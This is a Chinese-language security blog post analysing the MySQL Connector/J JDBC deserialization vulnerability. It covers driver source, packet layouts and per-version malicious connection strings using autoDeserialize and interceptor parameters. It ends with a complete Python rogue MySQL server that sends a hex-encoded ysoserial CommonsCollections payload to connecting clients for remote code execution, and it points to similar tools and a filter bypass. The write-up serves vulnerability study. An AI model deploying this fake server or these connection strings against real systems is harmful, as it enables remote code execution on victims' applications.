JDBC介绍
JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现,本文中的代码都是针对MySQL数据库实现的。
简单来讲就是一种java于数据库之间连接的规范,即java提供了一系列api用户java语言和各种数据库之间进行交互,但是这个jdbc不是最终的实现方法,实现java对数据库的增删查改实在数据库驱动文件里面提供的,这也是为什么我们在连接数据库之前都要先Class.forName一下驱动jar包。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| package JDBC;
import java.sql.*;
public class jdbc {
public static void main(String[] args) throws ClassNotFoundException, SQLException {
String Driver = "com.mysql.cj.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/jdbc";
Class.forName(Driver);
Connection conn = DriverManager.getConnection(DB_URL, "root", "pysnow");
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from users");
while (rs.next()) {
System.out.println(rs.getString("id") + " : " + rs.getString("username"));
}
}
}
|
这里注释里说明了mysql驱动类在
mysql-connector-java 5:com.mysql.jdbc.Driver
mysql-connector-java 6及以上:com.mysql.cj.jdbc.Driver
这是因为该mysql-connector-java 6以上就把驱动类迁移到com.mysql.cj.jdbc.Driver去了
但是你在mysql-connector-java 8上用com.mysql.jdbc.Driver作为驱动类也是能跑的,通过上图我们知道mysql-connector8对5版本进行了兼容
只不过他会警告你com.mysql.jdbc.Driver已经被废弃了
另外对于mysql-connector驱动jar包的版本主要分为5.x和8.x,可以去maven仓库看一下https://mvnrepository.com/artifact/mysql/mysql-connector-java,其中6.x为8.x的低版本
原理介绍
攻击者能够控制JDBC连接字符串的参数如下
String DB_URL = "jdbc:mysql://127.0.0.1:3306/jdbc"
这里就是没有添加任何参数的,我们可以使用?xx=xxx的方式添加参数,下面介绍几个
tatementInterceptors:连接参数是用于指定实现com.mysql.jdbc.StatementInterceptor 接口的类的逗号分隔列表的参数。这些拦截器可用于通过在查询执行和结果返回之间插入自定义逻辑来影响查询执行的结果,这些拦截器将被添加到一个链中,第一个拦截器返回的结果将被传递到第二个拦截器,以此类推。在 8.0 中被queryInterceptors参数替代。
(其实就是指定自己的filter过滤器,对数据库的查询结果进行处理,类似于tomcat的filter)
queryInterceptors:一个逗号分割的Class列表(实现了com.mysql.cj.interceptors.QueryInterceptor接口的Class),在Query”之间”进行执行来影响结果。(效果上来看是在Query执行前后各插入一次操作)
(类似于上一个,在查询数据库前后进行指定操作,类似于tomcat的listener等)
autoDeserialize:自动检测与反序列化存在BLOB字段中的对象。
(JDBC反序列化漏洞的核心,java通过jdbc查询一个blob字段的数据,他返回回来时java默认是把其当做字节流数组处理,而开启了这个参数则会对其进行readObject反序列化,再配合驱动jar包里面的链子进行rce)
detectCustomCollations:驱动程序是否应该检测服务器上安装的自定义字符集/排序规则,如果此选项设置为“true”,驱动程序会在每次建立连接时从服务器获取实际的字符集/排序规则。这可能会显着减慢连接初始化速度。
(SHOW SESSION STATUS,SHOW COLLATION)
其中最重要的就是autoDeserialize参数,当他为true的时候为自动反序列化从数据库发送过来的blob二进制数据字段,而不是将他当做byte字节数组处理
而有些时候我们只能控制jdbc对数据库的连接,不知道他会查询哪些字段怎么办,其实
原理分析
反序列化触发点
主要利用com.mysql.cj.jdbc.result.ResultSetImpl.getObject()这个函数,该方法是ResultSetImpl数据库结果集处理类下的一个方法,该方法用于在查询ResultSet结果集中通过列索引获取对应的值,并根据该值的类型转换成java对象,如果该字段是varchar就转化成字符串,是interger就转化成整数,是blob,binary这些就转化成byte[]数组,只不过二进制数据这里还有额外的处理逻辑
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
| public Object getObject(int columnIndex) throws SQLException {
checkRowPos();
checkColumnBounds(columnIndex);
int columnIndexMinusOne = columnIndex - 1;
if (this.thisRow.getNull(columnIndexMinusOne)) {
return null;
}
Field field = this.columnDefinition.getFields()[columnIndexMinusOne];
switch (field.getMysqlType()) {
case BIT:
if (field.isBinary() || field.isBlob()) {
byte[] data = getBytes(columnIndex);
if (this.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue()) {
Object obj = data;
if ((data != null) && (data.length >= 2)) {
if ((data[0] == -84) && (data[1] == -19)) {
try {
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
} catch (ClassNotFoundException cnfe) {
throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
+ Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
} catch (IOException ex) {
obj = data;
}
} else {
return getString(columnIndex);
}
}
return obj;
}
return data;
}
return field.isSingleBit() ? Boolean.valueOf(getBoolean(columnIndex)) : getBytes(columnIndex);
.....
case BLOB:
if (field.isBinary() || field.isBlob()) {
byte[] data = getBytes(columnIndex);
if (this.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue()) {
Object obj = data;
if ((data != null) && (data.length >= 2)) {
if ((data[0] == -84) && (data[1] == -19)) {
try {
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
} catch (ClassNotFoundException cnfe) {
throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
+ Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
} catch (IOException ex) {
obj = data;
}
} else {
return getString(columnIndex);
}
}
return obj;
}
return data;
}
return getBytes(columnIndex);
.....
}
}
|
可以看到BIT和BLOB两种类型都涉及到了反序列化的相关代码
这两处的代码逻辑是一样的,都是先判断PropertyKey.autoDeserialize这个属性是否为true,如果为true则判断前两个字节是不是分别为-84和-19,熟悉java反序列化的都知道这个就是java序列化字节流的特征aced
触发ResultSetImpl.getObject
这里以8.x的ServerStatusDiffInterceptor链作为例子讲解原理
在ServerStatusDiffInterceptor类里面的populateMapWithSessionStatusValues方法向mysql服务器发送SHOW SESSION STATUS查询语句,并将查询结果调用resultSetToMap方法进行转化成map
我们跟进一下发现这里的键是直接使用ResultSetImpl.getObject进行转化,并且列索引号为1和2,其实就是对应结果的变量名和值
触发拦截器
找到触发点了在这个Interceptor拦截器里面,但是要怎么触发呢
前面我们提到了queryInterceptors这个参数用于指定继承与QueryInterceptor接口的拦截器类
会在query执行前后进行指定操作,通过看源码我们可以知道这两个操作就是preProcess和postProcess,并且这两个方法都调用了populateMapWithSessionStatusValues
流量分析
我们通过流量分析一下添加了 queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor参数的区别
我们直接运行可以发现这里就是在query查询的时候添加了一个对Server status改变的的信息
我们多执行一条语句那就多调用一次拦截器,这个参数就是这个道理,这里你可以要问,我们删除了select * from users这条query之后只进行jdbc连接他还是会调用一次这里拦截器这是为什么,这是因为在进行连接的时候会自动执行一次SET autocommit=1语句
这里我们接着分析查询了SHOW SESSION STATUS的返回流量
可以看到这里一共有两列,Variable_name和Value
这里为了让客户端能够将字段值解析成blob就需要修改field packet里面的type字段
最后在传完row packet结果集之后拼接上一个EOF包代表end
mysql协议拓展
这里再拓展一下,mysql返回的查询结果数据包总共有以下四个种类
错误包(ERR Packet)
正确包(OK Packet)
Protocol::LOCAL_INFILE_Request
结果集(ProtocolText::Resultset)
没有回显的查询结果一般就是OK包,有查询结果的就返回Resultset,有错误就返回ERR包,这里重点讲解一下Resultset包,也是反序列化payload存放的位置
大概有四个段
colum_count:表示有多少列
file packet:表示列的结构
row packet:表示查询的每一行数据
EOF包:终止包end of 啥
接着再看一下file packet的结构
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| 1a 00 00 //3字节表示长度(这个长度说的是协议的内容长度,不包括序号那一字节)
02 //序号 因为是第二个数据字段
03646566 // 这个就是def的意思。
00 //schema 协议因为不使用就用00
01 63 //table 因为我们使用列数据,就不需要名字了,下面几个都是任意字符。字符串第一字节是用来说明长度的。
01 63 //org_table 01表示1字节,63是数据
0163 //name
0163 //org_name
0c filler // length of the following fields 总是0x0c
3f00 //characterset 字符编码 003f是binary
ffff0000 column_length //允许数据最大长度,就是我们行数据的最大长度。ffff
fc //column_type 这一列数据类型 fc表示blob
9000 //flags 9000用的官方的 poc可以运行。 看fnmsd的要大于128好像。
00 //decimals
0000 //filler_2
|
可以对应这个注释看一下
至于 EOF 包 要不要放在列定义和行数据之间我也不知道, 反正流量里面都没有这么写,貌似是参考的这个图,这里面在column_def和row之间有个eof,可能是版本问题?高版本取消了?
PS:要让客户端解析反序列化字段不仅需要blob类型加autoSerialize属性之外还需要字段定义FLAGS大于128、来源表不为空,否则会被当做Text
反序列化调用利用链
detectCustomCollations链
5.1.18以下:不可用
5.1.19-5.1.28:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
(这段版本detectCustomCollations属性默认为true)
5.1.29-5.1.48:
jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
(5.1.41-5.1.48时 com.mysql.jdbc.ConnectionImpl#buildCollationMapping()方法,)
5.1.41版本后,不再使用com.mysql.jdbc.Util#resultSetToMap()方法获取”SHOW COLLATION”的结果,但又直接调用了results.getObject(3) )
5.1.49:不可用
6.0.2-6.0.6:
jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
8.x.x :不可用
ServerStatusDiffInterceptor链
5.1.0-5.1.10:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc 连接后需执行查询( 前面分析所述的连接时的SQL查询是在createNewIO方法中会触发,但是由于5.1.10及以前,Interceptors的初始化在createNewIO之后,导致查询触发前还不存在Interceptors,故无法在getConnection时触发。 )
5.1.11-5.x.xx:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc (驱动包名修改啊了,为旧版本的com.mysql.jdbc.xx)
6.x:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc (包名中添加cj并且连接参数为statementInterceptors=xx)
8.0.20以下:
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
8.0.20以后:
直接不调用 resultSetToMap 了,所以链子就没了
detectCustomCollations调用链分析
5.1.19-5.1.28版本只判断版本是否大于4.1.0,若大于则可直接利用。
com.mysql.jdbc.ConnectionImpl#buildCollationMapping()方法 ,但是后面要调用Util.resultSetToMap则需要版本大于5.0.0
里面则是对键和值反别进行getObject调用
5.1.41-5.1.48
5.1.41版本后,不再使用com.mysql.jdbc.Util#resultSetToMap()方法获取”SHOW COLLATION”的结果,但又直接调用了results.getObject(3)
这个函数的作用是构建一个字符集和排序规则的映射关系。
如果没有缓存的映射关系,且配置了检测自定义排序规则,并且数据库版本满足最低要求(4.1.0以上),则开始构建映射。
这里单独把getObject函数拉出来看一下
可以知道这里跟8.x不同,这里调用了getObjectDeserializingIfNeeded来进行反序列化
跟进看一下就是8.x的写法
接着看一下他的调用堆栈
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| getObject:4475, ResultSetImpl (com.mysql.jdbc)
buildCollationMapping:935, ConnectionImpl (com.mysql.jdbc)
initializePropsFromServer:3248, ConnectionImpl (com.mysql.jdbc)
connectOneTryOnly:2249, ConnectionImpl (com.mysql.jdbc)
createNewIO:2035, ConnectionImpl (com.mysql.jdbc)
<init>:790, ConnectionImpl (com.mysql.jdbc)
<init>:47, JDBC4Connection (com.mysql.jdbc)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
handleNewInstance:425, Util (com.mysql.jdbc)
getInstance:400, ConnectionImpl (com.mysql.jdbc)
connect:330, NonRegisteringDriver (com.mysql.jdbc)
getConnection:664, DriverManager (java.sql)
getConnection:247, DriverManager (java.sql)
main:13, jdbc (JDBC)
|
其实就是在连接初始化的时候会使用ConnectionImpl来进行处理连接,并且在其构造函数会调用createNewIO与数据库建立io连接,并调用initializePropsFromServer初始化各种字符集,则就会调用到getObject
JDBC字符串绕过
Apache-Inlong那个洞的绕过,用#号注释和其他jdbc字符串格式进行绕过
利用脚本与复现
Tri0mphe7
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
|
import socket
import binascii
import os
greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
//file文件的内容使用ysoserial生成的 使用规则 java -jar ysoserial [common7那个] "calc" > a
file= r'a'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
return payload_content
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
send_data(conn,greeting_data)
while True:
receive_data(conn)
send_data(conn,response_ok_data)
data=receive_data(conn)
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
//获取payload
payload_content=get_payload_content()
//计算payload长度
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
//计算数据包长度
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3309
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST,PORT))
run()
|
这个脚本比较好懂,我这篇文章就是基于这个来分析的,用的是connector <8.0.20的ServerStatusDiffInterceptor,payload是放在变量值里面的,虽然他这里两个field的定义都是一样的
懂原理的话这个是最好用的
fnmsd
https://github.com/fnmsd/MySQL_Fake_Server
这个写的时候已经比较老了,只能有低版本的python才能跑起来
4ar1n
4ra1n许师傅改进版,有jui并且还支持其他类型数据库,但是我本地测的时候不知道为什么打不通
后面发现读文件是读到本地的,没有回显
rmb122
https://github.com/rmb122/rogue_mysql_server
没用过,但是这个用来读文件用得比较多
参考链接
https://xz.aliyun.com/t/8159
https://tttang.com/archive/1877
https://github.com/fnmsd/MySQL_Fake_Server
https://www.anquanke.com/post/id/203086
